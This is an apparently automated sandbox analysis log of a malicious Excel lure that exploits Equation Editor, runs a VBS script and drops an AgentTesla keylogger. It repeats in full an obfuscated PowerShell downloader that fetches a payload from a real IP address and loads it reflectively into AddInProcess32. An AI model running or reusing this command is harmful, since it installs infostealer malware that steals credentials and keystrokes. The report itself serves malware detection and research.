                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: 6.2.powershell.exe.33b9a80.1.raw.unpack, 8WWn.cs.Net Code: lLRvJ

                  System Summary

                  barindex
                  Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
                  Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 6.2.powershell.exe.33b9a80.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 6.2.powershell.exe.33b9a80.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 6.2.powershell.exe.33b9a80.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 6.2.powershell.exe.33b9a80.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 540, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}\ProgIDJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\ProgIDJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('by6link = EnNhttp://91.92.254.194/imge/new-image_v.jpgEnN; by6webClient ='+' New-Object System.N'+'et.WebClient; tr'+'y { by6downloadedData = b'+'y6webClient.DownloadData(by6link) } catch { Write'+'-H'+'ost EnNFailed To download dat'+'a f'+'rom by6linkEnN -ForegroundColor Red; exit }; if (by6downloadedData -ne by6null) { by6ima'+'geT'+'ext = [System.Text.Encoding]::UTF8.GetString(by6downloadedData); by6star'+'tFlag'+' = EnN<<BASE64_START>>EnN; by6endFlag = EnN<<BASE64_END>>EnN; by6startIndex = by6imageText.IndexOf(by6startFlag); by6endIndex = by6ima'+'geTe'+'xt.I'+'ndexOf(by6en'+'dFlag); if (by6startIndex'+' -ge 0 -and b'+'y6endIndex -gt by6startIndex) { by6st'+'artIndex += by6startFl'+'ag.Length; by6base6'+'4Length = by6endIndex - by6startIndex; by6base64Co'+'mmand = by6imageText.Substring(by6startInd'+'ex, by6ba'+'se64Length); by6commandByt'+'es = [System.Convert]::FromBase6'+'4String(by6base64Command); by6loadedAssembly = [System.Reflection.Assembly]::L'+'oad(by6commandBytes); by6t'+'ype = by6loadedAssembly.GetType(EnNRunPE.HomeEnN); by6method = by6type.GetMethod(EnNVAIEnN).Invoke(by6null, [object'+'[]] (E'+'nNtxt.46esab/841.612.3.291//:ptthEnN , EnNdesativadoEnN , '+'EnNdesativa'+'doEnN , EnNdesativadoEnN,EnNA'+'dd'+'InProcess32EnN,EnNEn'+'N)) } }')-CREPLACE([CHar]98+[CHar]121+[CHar]54),[CHar]36 -rEpLaCe([CHar]69+[CHar]110+[CHar]78),[CHar]39)| iex"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('by6link = EnNhttp://91.92.254.194/imge/new-image_v.jpgEnN; by6webClient ='+' New-Object System.N'+'et.WebClient; tr'+'y { by6downloadedData = b'+'y6webClient.DownloadData(by6link) } catch { Write'+'-H'+'ost EnNFailed To download dat'+'a f'+'rom by6linkEnN -ForegroundColor Red; exit }; if (by6downloadedData -ne by6null) { by6ima'+'geT'+'ext = [System.Text.Encoding]::UTF8.GetString(by6downloadedData); by6star'+'tFlag'+' = EnN<<BASE64_START>>EnN; by6endFlag = EnN<<BASE64_END>>EnN; by6startIndex = by6imageText.IndexOf(by6startFlag); by6endIndex = by6ima'+'geTe'+'xt.I'+'ndexOf(by6en'+'dFlag); if (by6startIndex'+' -ge 0 -and b'+'y6endIndex -gt by6startIndex) { by6st'+'artIndex += by6startFl'+'ag.Length; by6base6'+'4Length = by6endIndex - by6startIndex; by6base64Co'+'mmand = by6imageText.Substring(by6startInd'+'ex, by6ba'+'se64Length); by6commandByt'+'es = [System.Convert]::FromBase6'+'4String(by6base64Command); by6loadedAssembly = [System.Reflection.Assembly]::L'+'oad(by6commandBytes); by6t'+'ype = by6loadedAssembly.GetType(EnNRunPE.HomeEnN); by6method = by6type.GetMethod(EnNVAIEnN).Invoke(by6null, [object'+'[]] (E'+'nNtxt.46esab/841.612.3.291//:ptthEnN , EnNdesativadoEnN , '+'EnNdesativa'+'doEnN , EnNdesativadoEnN,EnNA'+'dd'+'InProcess32EnN,EnNEn'+'N)) } }')-CREPLACE([CHar]98+[CHar]121+[CHar]54),[CHar]36 -rEpLaCe([CHar]69+[CHar]110+[CHar]78),[CHar]39)| iex"Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_002438F08_2_002438F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_002449108_2_00244910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0024F4E88_2_0024F4E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0024BD088_2_0024BD08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00243C388_2_00243C38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_005818608_2_00581860
                  Source: Nuevo orden.xlam.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
                  Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 6.2.powershell.exe.33b9a80.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 6.2.powershell.exe.33b9a80.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 6.2.powershell.exe.33b9a80.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 6.2.powershell.exe.33b9a80.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: Process Memory Space: powershell.exe PID: 540, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 6.2.powershell.exe.33b9a80.1.raw.unpack, G39cBQ.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.33b9a80.1.raw.unpack, G39cBQ.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.33b9a80.1.raw.unpack, sDtvQjPGfa.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.33b9a80.1.raw.unpack, sDtvQjPGfa.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.33b9a80.1.raw.unpack, sDtvQjPGfa.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.33b9a80.1.raw.unpack, sDtvQjPGfa.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.33b9a80.1.raw.unpack, b1PPCKov2KZ.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.33b9a80.1.raw.unpack, b1PPCKov2KZ.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@8/7@1/4
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Nuevo orden.xlam.xlsxJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: NULL
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8017.tmpJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\datingloverstartingAgain.vbs"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: Nuevo orden.xlam.xlsxReversingLabs: Detection: 75%
                  Source: Nuevo orden.xlam.xlsxVirustotal: Detection: 54%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\datingloverstartingAgain.vbs"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('by6link = EnNhttp://91.92.254.194/imge/new-image_v.jpgEnN; by6webClient ='+' New-Object System.N'+'et.WebClient; tr'+'y { by6downloadedData = b'+'y6webClient.DownloadData(by6link) } catch { Write'+'-H'+'ost EnNFailed To download dat'+'a f'+'rom by6linkEnN -ForegroundColor Red; exit }; if (by6downloadedData -ne by6null) { by6ima'+'geT'+'ext = [System.Text.Encoding]::UTF8.GetString(by6downloadedData); by6star'+'tFlag'+' = EnN<<BASE64_START>>EnN; by6endFlag = EnN<<BASE64_END>>EnN; by6startIndex = by6imageText.IndexOf(by6startFlag); by6endIndex = by6ima'+'geTe'+'xt.I'+'ndexOf(by6en'+'dFlag); if (by6startIndex'+' -ge 0 -and b'+'y6endIndex -gt by6startIndex) { by6st'+'artIndex += by6startFl'+'ag.Length; by6base6'+'4Length = by6endIndex - by6startIndex; by6base64Co'+'mmand = by6imageText.Substring(by6startInd'+'ex, by6ba'+'se64Length); by6commandByt'+'es = [System.Convert]::FromBase6'+'4String(by6base64Command); by6loadedAssembly = [System.Reflection.Assembly]::L'+'oad(by6commandBytes); by6t'+'ype = by6loadedAssembly.GetType(EnNRunPE.HomeEnN); by6method = by6type.GetMethod(EnNVAIEnN).Invoke(by6null, [object'+'[]] (E'+'nNtxt.46esab/841.612.3.291//:ptthEnN , EnNdesativadoEnN , '+'EnNdesativa'+'doEnN , EnNdesativadoEnN,EnNA'+'dd'+'InProcess32EnN,EnNEn'+'N)) } }')-CREPLACE([CHar]98+[CHar]121+[CHar]54),[CHar]36 -rEpLaCe([CHar]69+[CHar]110+[CHar]78),[CHar]39)| iex"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\datingloverstartingAgain.vbs" Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('by6link = EnNhttp://91.92.254.194/imge/new-image_v.jpgEnN; by6webClient ='+' New-Object System.N'+'et.WebClient; tr'+'y { by6downloadedData = b'+'y6webClient.DownloadData(by6link) } catch { Write'+'-H'+'ost EnNFailed To download dat'+'a f'+'rom by6linkEnN -ForegroundColor Red; exit }; if (by6downloadedData -ne by6null) { by6ima'+'geT'+'ext = [System.Text.Encoding]::UTF8.GetString(by6downloadedData); by6star'+'tFlag'+' = EnN<<BASE64_START>>EnN; by6endFlag = EnN<<BASE64_END>>EnN; by6startIndex = by6imageText.IndexOf(by6startFlag); by6endIndex = by6ima'+'geTe'+'xt.I'+'ndexOf(by6en'+'dFlag); if (by6startIndex'+' -ge 0 -and b'+'y6endIndex -gt by6startIndex) { by6st'+'artIndex += by6startFl'+'ag.Length; by6base6'+'4Length = by6endIndex - by6startIndex; by6base64Co'+'mmand = by6imageText.Substring(by6startInd'+'ex, by6ba'+'se64Length); by6commandByt'+'es = [System.Convert]::FromBase6'+'4String(by6base64Command); by6loadedAssembly = [System.Reflection.Assembly]::L'+'oad(by6commandBytes); by6t'+'ype = by6loadedAssembly.GetType(EnNRunPE.HomeEnN); by6method = by6type.GetMethod(EnNVAIEnN).Invoke(by6null, [object'+'[]] (E'+'nNtxt.46esab/841.612.3.291//:ptthEnN , EnNdesativadoEnN , '+'EnNdesativa'+'doEnN , EnNdesativadoEnN,EnNA'+'dd'+'InProcess32EnN,EnNEn'+'N)) } }')-CREPLACE([CHar]98+[CHar]121+[CHar]54),[CHar]36 -rEpLaCe([CHar]69+[CHar]110+[CHar]78),[CHar]39)| iex"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wbemcomn2.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntdsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: RunPE.pdb source: powershell.exe, 00000006.00000002.475615054.000000000623A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.475615054.00000000061A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.473212454.00000000002B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Nuevo orden.xlam.xlsxInitial sample: OLE indicators vbamacros = False

                  Data Obfuscation

                  barindex
                  Source: 6.2.powershell.exe.61e08f4.3.raw.unpack, RunPEE.cs.Net Code: Run4 System.Reflection.Assembly.Load(byte[])
                  Source: 6.2.powershell.exe.65cd9c4.2.raw.unpack, RunPEE.cs.Net Code: Run4 System.Reflection.Assembly.Load(byte[])
                  Source: 6.2.powershell.exe.2b0000.0.raw.unpack, RunPEE.cs.Net Code: Run4 System.Reflection.Assembly.Load(byte[])
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('by6link = EnNhttp://91.92.254.194/imge/new-image_v.jpgEnN; by6webClient ='+' New-Object System.N'+'et.WebClient; tr'+'y { by6downloadedData = b'+'y6webClient.DownloadData(by6link) } catch { Write'+'-H'+'ost EnNFailed To download dat'+'a f'+'rom by6linkEnN -ForegroundColor Red; exit }; if (by6downloadedData -ne by6null) { by6ima'+'geT'+'ext = [System.Text.Encoding]::UTF8.GetString(by6downloadedData); by6star'+'tFlag'+' = EnN<<BASE64_START>>EnN; by6endFlag = EnN<<BASE64_END>>EnN; by6startIndex = by6imageText.IndexOf(by6startFlag); by6endIndex = by6ima'+'geTe'+'xt.I'+'ndexOf(by6en'+'dFlag); if (by6startIndex'+' -ge 0 -and b'+'y6endIndex -gt by6startIndex) { by6st'+'artIndex += by6startFl'+'ag.Length; by6base6'+'4Length = by6endIndex - by6startIndex; by6base64Co'+'mmand = 